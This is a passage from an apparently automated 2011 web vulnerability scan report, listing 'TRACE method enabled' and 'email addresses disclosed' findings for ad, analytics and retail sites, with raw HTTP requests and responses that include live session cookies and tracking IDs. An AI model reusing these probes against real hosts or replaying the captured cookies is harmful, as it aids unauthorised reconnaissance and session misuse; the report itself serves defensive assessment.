Cookie: 545adb96173c7251
Host: media.gsimedia.net


19.9. http://metrics.pacsun.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.pacsun.com
Path:   /

Request

TRACE / HTTP/1.0
Host: metrics.pacsun.com
Cookie: d454b6f06560be7a

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:28 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: metrics.pacsun.com
Cookie: d454b6f06560be7a
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


19.10. http://pixel.rubiconproject.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 576ea5ef7a3e3506

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:49 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 576ea5ef7a3e3506
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


19.11. http://pixel.traveladvertising.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.traveladvertising.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.traveladvertising.com
Cookie: ab56f008fab1262d

Response

HTTP/1.1 200 OK
Content-Type: message/http
Content-Length: 184
Connection: Close

TRACE / HTTP/1.1
Host: pixel.traveladvertising.com
Cookie: ab56f008fab1262d
X-Forwarded-For: 173.193.214.243
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive

19.12. http://s.xp1.ru4.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s.xp1.ru4.com
Path:   /

Request

TRACE / HTTP/1.0
Host: s.xp1.ru4.com
Cookie: 537b0e1e2aed386a

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 01:57:55 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: s.xp1.ru4.com
Cookie: 537b0e1e2aed386a


19.13. http://secure-us.imrworldwide.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /

Request

TRACE / HTTP/1.0
Host: secure-us.imrworldwide.com
Cookie: 9b9331fb7d46202c

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:13 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 9b9331fb7d46202c
Host: secure-us.imrworldwide.com


19.14. http://srv.clickfuse.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://srv.clickfuse.com
Path:   /

Request

TRACE / HTTP/1.0
Host: srv.clickfuse.com
Cookie: 9986882a195c500e

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Mon, 16 May 2011 02:02:59 GMT
Server: Apache
Content-Length: 176
Connection: Close

TRACE / HTTP/1.1
host: srv.clickfuse.com
Cookie: 9986882a195c500e
X-Forwarded-For: 173.193.214.243
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive


19.15. http://sv.liveclicker.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sv.liveclicker.net
Path:   /

Request

TRACE / HTTP/1.0
Host: sv.liveclicker.net
Cookie: 6e68b12f0aa92f35

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:03 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: sv.liveclicker.net
Cookie: 6e68b12f0aa92f35


19.16. http://wasc.homedepot.ca/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wasc.homedepot.ca
Path:   /

Request

TRACE / HTTP/1.0
Host: wasc.homedepot.ca
Cookie: 1ebe89bfb65b24e8

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:11 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: wasc.homedepot.ca
Cookie: 1ebe89bfb65b24e8
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


19.17. https://www.toshibadirect.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.toshibadirect.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.toshibadirect.com
Cookie: 388c0f6b4a6b7eb1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:45:01 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.toshibadirect.com
Cookie: 388c0f6b4a6b7eb1


20. Email addresses disclosed
There are 42 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


20.1. http://ads.adbrite.com/adserver/vdi/684339

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/vdi/684339?d=110 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3148241261951.6255?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; srh="1%3Aq64FAA%3D%3D"; rb2=ChMKBjY4NDMzORi1nd_6EiIDMTEwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; rb=0:684339:20838240:110:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0; ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlCAfhpzZWjsxiurlJxDuGWHJXSIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; vsd=0@2@4dd08156@www.imiclk.com

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 16 May 2011 01:55:15 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=ChMKBjY4NDMzORipgJT7EiIDMTEwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; path=/; domain=.adbrite.com; expires=Sun, 14-Aug-2011 01:55:15 GMT
Set-Cookie: ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlBwDuGWlaGxS6isUoJ%2BGnOHjXeIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 13-May-2021 01:55:15 GMT
Set-Cookie: vsd=0@1@4dd08403@fls.doubleclick.net; path=/; domain=.adbrite.com; expires=Wed, 18-May-2011 01:55:15 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

20.2. http://ads.adbrite.com/adserver/vdi/684339

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/vdi/684339?d=4dd07bc8-e97b-118c-3dec-7b8c5c306530 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=vj1j4Xj8&did=womens
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; srh="1%3Aq64FAA%3D%3D"; rb=0:684339:20838240:110:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0; rb2=ChMKBjY4NDMzORi49477EiIDMTEwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlBwDuGWlaGxS6isUoJ%2BGnOHjXeIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; vsd=0@1@4dd083b0@fls.doubleclick.net

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 16 May 2011 01:58:26 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=CjQKBjY4NDMzORj20p_7EiIkNGRkMDdiYzgtZTk3Yi0xMThjLTNkZWMtN2I4YzVjMzA2NTMwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; path=/; domain=.adbrite.com; expires=Sun, 14-Aug-2011 01:58:26 GMT
Set-Cookie: ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlCAfhpzZWjsxiurlJxDuGWHJXSIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 13-May-2021 01:58:26 GMT
Set-Cookie: vsd=0@1@4dd084c2@www.imiclk.com; path=/; domain=.adbrite.com; expires=Wed, 18-May-2011 01:58:26 GMT
Set-Cookie: rb=0:684339:20838240:4dd07bc8-e97b-118c-3dec-7b8c5c306530:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0; path=/; domain=.adbrite.com; expires=Sun, 14-Aug-2011 01:58:26 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

20.3. http://ads.adbrite.com/adserver/vdi/684339

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The following email address was disclosed in the response:

Request

GET /adserver/vdi/684339?d=110 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3072598970029.503?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; srh="1%3Aq64FAA%3D%3D"; rb2=CjQKBjY4NDMzORi15I_7EiIkNGRkMDdiYzgtZTk3Yi0xMThjLTNkZWMtN2I4YzVjMzA2NTMwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlCAfhpzZWjsxiurlJxDuGWHJXSIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; vsd=0@1@4dd083be@www.imiclk.com; rb=0:684339:20838240:4dd07bc8-e97b-118c-3dec-7b8c5c306530:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 16 May 2011 02:12:04 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=ChMKBjY4NDMzORjfydH7EiIDMTEwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; path=/; domain=.adbrite.com; expires=Sun, 14-Aug-2011 02:12:04 GMT
Set-Cookie: ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlBwDuGWlaGxS6isUoJ%2BGnOHjXeIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 13-May-2021 02:12:04 GMT
Set-Cookie: vsd=0@1@4dd087f4@fls.doubleclick.net; path=/; domain=.adbrite.com; expires=Wed, 18-May-2011 02:12:04 GMT
Set-Cookie: rb=0:684339:20838240:110:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0; path=/; domain=.adbrite.com; expires=Sun, 14-Aug-2011 02:12:04 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

20.4. http://buy.travelguard.com/tgi2/js/siteCatalyst.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.travelguard.com
Path:   /tgi2/js/siteCatalyst.js

Issue detail

The following email address was disclosed in the response:

Request

GET /tgi2/js/siteCatalyst.js HTTP/1.1
Host: buy.travelguard.com
Proxy-Connection: keep-alive
Referer: http://buy.travelguard.com/TGI2/proc/stateselector.aspx?pcode=MYTG&br=tgdirect&intcmp=clc-001-DualCTACruise-Feb19-ComMTG-SBSRight&arc=000329
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_pers_prop19%3Dus_direct%7C1463190879719%3B%20s_depth%3D2%7C1305512680332%3B%20gpv_pageName%3Dus_direct%253A/%7C1305543781337%3B%20s_pers_prop21%3D000329%7C1463221981339%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3Dus_direct%253A/%255E%255E/assets/0/72/4294967353/4294967354/4294967375/4294967799/8588a51f-2840-49a2-bfb6-02c937c47b94.jpg%255E%255Eus_direct%253A/%2520%257C%2520/assets/0/72/4294967353/4294967354/4294967375/4294967799/8588a51f-2840-49a2-bfb6-02c937c47b94.jpg%255E%255E%3B%20s_sq%3Dcebwa001%252Ccebwaglobalchartis%253D%252526pid%25253Dus_direct%2525253A/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//buy.travelguard.com/TGI2/proc/stateselector.aspx%2525253Fpcode%2525253DMYTG%25252526br%2525253Dtgdirect%25252526intcmp%2525253Dclc-001-DualCT%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Content-Length: 39896
Content-Type: application/x-javascript
Last-Modified: Mon, 29 Mar 2010 16:10:24 GMT
Accept-Ranges: bytes
ETag: "09893565acfca1:1ea23"
Server: Microsoft-IIS/6.0
P3P: CP=NOI DSP COR NID ADMa OPTa OUR NOR
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:33:07 GMT

.../* SiteCatalyst code version: H.20.3.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
...[SNIP]...
=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id
...[SNIP]...

20.5. http://hire.jobvite.com/CompanyJobs/Careers.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /CompanyJobs/Careers.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /CompanyJobs/Careers.aspx?c=qlZ9Vfw8 HTTP/1.1
Host: hire.jobvite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=am2qlgznv2utc045d0xr1hr3; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: guestidc=5ca2bcbf-4c16-4cf2-b0d2-57e62d1c65f1; expires=Wed, 15-Jun-2011 10:22:19 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:22:19 GMT
Content-Length: 40128

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link href="http://hir
...[SNIP]...
<a href="mailto:service@bluenile.com" class="blue">service@bluenile.com</a>
...[SNIP]...

20.6. http://hire.jobvite.com/CompanyJobs/careers_8.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /CompanyJobs/careers_8.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /CompanyJobs/careers_8.js?v=118 HTTP/1.1
Host: hire.jobvite.com
Proxy-Connection: keep-alive
Referer: http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qlZ9Vfw8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=43apaaeak4cjn155sab1plb2; guestidc=8b41a0ab-dfdd-4e51-b8b4-0325a58c4684

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Apr 2011 18:44:18 GMT
Accept-Ranges: bytes
ETag: "0ad44209dfbcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:22:31 GMT
Content-Length: 66581

.../*
* COPYRIGHT 2011 Jobvite, Inc. All rights reserved. This copyright notice is Copyright Management
* Information under 17 USC 1202 and is included to protect this work and deter copyright infrin
...[SNIP]...
</div>');
       _contactImportError = null;
   }
   var i = '';
   switch (_contactImportSource)
   {
       case 'LinkedIn':
           i += 'yourname@company.com';
           break;
       case 'Yahoo':
           i += 'yourname@yahoo.com';
           break;
       case 'Gmail':
           i += 'yourname@gmail.com';
           break;
       case 'Hotmail':
           i += 'yourname@hotmail.com';
           break;
       default:
           i = '';
           break;
   }
   d.addRow('<div">
...[SNIP]...

20.7. https://ordering.ftd.com/new-signup/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /new-signup/

Issue detail

The following email address was disclosed in the response:

Request

GET /new-signup/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:28:42 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:28:42 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 117006


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<a href="mailto:autorenew@ftdi.com">autorenew@ftdi.com</a>
...[SNIP]...
<a href="mailto:autorenew@ftdi.com">autorenew@ftdi.com</a>
...[SNIP]...

20.8. https://ordering.ftd.com/reminder-signin/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /reminder-signin/

Issue detail

The following email address was disclosed in the response:

Request

GET /reminder-signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: https://ordering.ftd.com/new-signup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Sweet%20Shop%5C%22%2C%5C%22type%5C%22%3A%5C%22index%5C%22%2C%5C%22value%5C%22%3A%5C%22%252Fsweet-shop-ctg%252Fproduct-sweet-shop%252F%253Fmarkcode%253D528%5C%22%2C%5C%22prevName%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22prevType%5C%22%3A%5C%22home%5C%22%2C%5C%22prevValue%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=51933897653166366864628919699136; s_cc=true; last_active=1305541288018; mbcs=837A23D2-E1A6-55BC-B51D-1B2EBC885D29; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DCategory%25253Aproduct_sweet_shop%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305541789414

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:39:19 GMT
Server: Apache
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:39:20 GMT
Set-Cookie: pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 98257


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
<a href="mailto:autorenew@ftdi.com">autorenew@ftdi.com</a>
...[SNIP]...
<a href="mailto:autorenew@ftdi.com">autorenew@ftdi.com</a>
...[SNIP]...

20.9. https://ordering.ftd.com/signin/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /signin/

Issue detail

The following email address was disclosed in the response:

Request

GET /signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; s_cc=true; last_active=1305510812803; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511186703

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:09:59 GMT
Server: Apache
Set-Cookie: track_id=baabe59f09870e0c5f1e6606009b9fb7e5a425b7fc231e55d6f4be1dbe08dc9c; expires=Thu, 13 May 2021 02:09:59 GMT; path=/; domain=.ftd.com
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
